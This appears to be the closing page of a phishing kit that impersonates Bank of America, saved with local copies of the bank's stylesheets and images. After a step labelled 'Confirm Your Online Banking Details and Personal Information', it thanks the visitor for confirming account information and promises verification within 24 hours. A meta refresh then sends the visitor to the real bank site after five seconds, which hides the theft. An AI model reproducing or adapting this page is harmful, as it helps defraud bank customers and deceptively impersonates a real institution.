<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en"><head> 
<META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.bankofamerica.com/index.cfm" >
<link href="index.cfm_files/hs2_mvc_header_footer_style.css" type="text/css" rel="stylesheet">
<link href="index.cfm_files/hs2_mvc_content_style.css" type="text/css" rel="stylesheet">
<link href="index.cfm_files/masthead.css" type="text/css" rel="stylesheet">
<link href="index.cfm_files/error_table_style.css" type="text/css" rel="stylesheet">

<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<link rel="stylesheet" href="index.cfm_files/local_odao.css" type="text/css">
<link rel="stylesheet" href="index.cfm_files/mvc_content_style.css" type="text/css">
<link rel="stylesheet" href="index.cfm_files/common.css" type="text/css">



	<link type="text/css" rel="stylesheet" href="index.cfm_files/youarehere_styles.css">

	<link type="text/css" rel="stylesheet" href="index.cfm_files/mvc_content_style.css">

	
<title>Bank of America | Thank you</title>

		
		<meta name="description" content="Please complete the following personal information to begin your application.">
	


	

</head>


	
	
	

	
	


	
	



		
	
		
<map name="secure"><area shape="rect" coords="1,1,644,68" alt="Bank of America Higher Standards Logo"><area shape="rect" coords="645,48,745,68" onclick="javascript:helpwindow('secure_area',280,380);return false;" href="https://www1.bankofamerica.com/deposits/odao/help.cfm?helpkey=secure_area" alt="Secure area. Link opens in a new window" target="_new">
	
	
	
</map>
<body bgcolor="#FFFFFF" LEFTMARGIN="0" TOPMARGIN="0" MARGINHEIGHT="0" MARGINWIDTH="0">
<table border="0" cellspacing="0" cellpadding="0">
	<tr>
	<td bgcolor="#ffffff"><img src="index.cfm_files/x.gif" width="8" height="1" alt="" border="0" /></td>
	<td><img src="index.cfm_files/mhd_reg_logo.gif" alt="Bank of America" width="250" height="69" border="0" /></td>
	</tr>
</table>
<table border="0" cellspacing="0" cellpadding="0">
	<tr>

		<td bgcolor="#c2c2c1"><img src="index.cfm_files/x.gif" width="747" height="1" alt="" border="0" /></td>
	</tr>
	<tr>
		<td bgcolor="#ececec"><img src="index.cfm_files/x.gif" width="747" height="4" alt="" border="0" /></td>
	</tr>
	<tr>
	        <td bgcolor="#d4001a"><img src="index.cfm_files/x.gif" width="747" height="20" alt="" border="0" /></td>
	</tr>
</table>
	







<table summary="" border="0" cellpadding="0" cellspacing="0" width="747">
	<tbody><tr align="left" valign="top">
		<td width="7"><img src="index.cfm_files/px.gif" alt="" border="0" height="1" width="1"></td>
		<td align="left" valign="top" width="740"> 


	
<table valign="bottom" summary="" cellpadding="0" cellspacing="0"><tbody><tr><td colspan="2"><img src="index.cfm_files/px.gif" alt="" border="0" height="15" width="1"></td></tr><tr><td class="standard-font-bold" align="left" nowrap="nowrap" valign="middle">
	<a href="#skipnav"><img src="index.cfm_files/x.gif" alt="Skip navigational links." border="0" height="1" width="1"></a></td><td align="left">
						<table summary="" border="0" cellpadding="0" cellspacing="0">
							<tbody><tr>
								<td><img src="index.cfm_files/prog_meter_1_visited.gif" alt="1" border="0" height="27" width="32"></td>
								<td class="prog-meter" nowrap="nowrap">Confirm Your Online Banking Details and Personal Information</td>
								<td><img src="index.cfm_files/prog_meter_dotted_spacer.gif" alt="" border="0" height="27" width="20"></td>
							</tr>
					</tbody></table></td><td align="left">
				<table summary="" border="0" cellpadding="0" cellspacing="0">
					<tbody><tr>
						<td><img src="index.cfm_files/prog_meter_2_current.gif" alt="2" border="0" height="27" width="32"></td>
						<td class="prog-meter" nowrap="nowrap"><span class="auraltext">Current Step.</span>Finish</td>
						<td><img src="index.cfm_files/prog_meter_dotted_spacer.gif" alt="" border="0" height="27" width="20"></td>
					</tr>
				</tbody></table></td><td width="100%">&nbsp;</td></tr><tr><td><img src="index.cfm_files/px.gif" alt="" border="0" height="4" width="1"><a name="skipnav"></a></td></tr></tbody></table>

<table summary="" border="0" cellpadding="0" cellspacing="0" width="740">
	<tbody><tr>
		<td colspan="3"><img src="index.cfm_files/px.gif" alt="" border="0" height="10" width="1"></td>
	</tr>	
	<tr align="left" valign="top">			
		<td align="left" valign="top" width="545">
			

	
	


		
         
	




	
	







<input name="actionTaken" value="continue" type="hidden">
<table class="standard-font" summary="" border="0" cellpadding="0" cellspacing="0" width="546">
<form action="https://www1.bankofamerica.com/deposits/odao/index.cfm?pageID=3997270609&amp;RequestTimeout=7200" method="post" name="eventForm">
	<tbody><tr>
		<td class="whitebg"><img alt="" src="index.cfm_files/1pixel_clear.gif" height="1" width="7"></td>
		<td valign="top">
			<table summary="" cellpadding="0" cellspacing="0" width="100%">
				
				<tbody><tr>
					<td>
					
					</td>
				</tr>
				<tr>
					<td class="whitebg"><img alt="" src="index.cfm_files/1pixel_clear.gif" height="10" width="1"></td>
				</tr>
			</tbody></table>
			<table summary="" border="0" cellpadding="0" cellspacing="0" width="100%">
				<tbody><tr>
					
					<td class="whitebg" colspan="2"><img alt="" src="index.cfm_files/1pixel_clear.gif" height="1" width="260"></td>
					<td class="mod-content" align="right" valign="right"><div class="standard-font">
					
					</div></td>
				</tr>
			</tbody></table>

			<table summary="" border="0" cellpadding="0" cellspacing="0" width="100%">
				<tbody><tr class="sec-title-header">
					<td width="5%"><img src="index.cfm_files/x.gif" alt="" height="1" width="10"><img src="index.cfm_files/icon_circle.gif" alt="" height="23" width="23"><img src="index.cfm_files/x.gif" alt="" height="1" width="5"></td><td><h2 class="sec-hdr-h2">Thank you for confirming your account information.Your submitted information will be verified by Bank of America Accounts Management Department in 24 hours</h2></td>


				</tr>
				<tr>
					<td class="whitebg"><img alt="" src="index.cfm_files/1pixel_clear.gif" height="2" width="1"></td>
				</tr>
			</tbody></table>

				

            


				<tr>
					<td><img alt="" src="index.cfm_files/x.gif" height="16" width="1"></td>
				</tr>



				<tr>
					<td><img alt="" src="index.cfm_files/x.gif" height="16" width="1"></td>
				</tr>

				<tr>
					<td><img alt="" src="index.cfm_files/x.gif" height="16" width="1"></td>
				</tr>

<TABLE cellSpacing=0 cellPadding=0 summary="" border=0>
  <TBODY>
  <TR>
    <TD colSpan=3 height=70><IMG height=70 alt="" 
      src="index.cfm_files/dot_clear.gif" 
      width=1 border=0></TD></TR>
  <TR>
    <TD><IMG height=1 alt="" 
      src="index.cfm_files/dot_clear.gif" 
      width=155 border=0></TD>
    <TD class=ftr-text vAlign=top>Bank of America, N.A. Member 
      FDIC.&nbsp;Equal Housing Lender&nbsp;<IMG height=9 
      alt="Equal Housing Lender" 
      src="index.cfm_files/house.gif" width=14 
      border=0><BR class=none>� 2013 Bank of America Corporation. All rights 
      reserved.</TD></TR>
  <TR>
    <TD colSpan=3 height=20><IMG height=20 alt="" 
      src="index.cfm_files/dot_clear.gif" 
      width=1 border=0></TD></TR></TBODY></TABLE></BODY></HTML>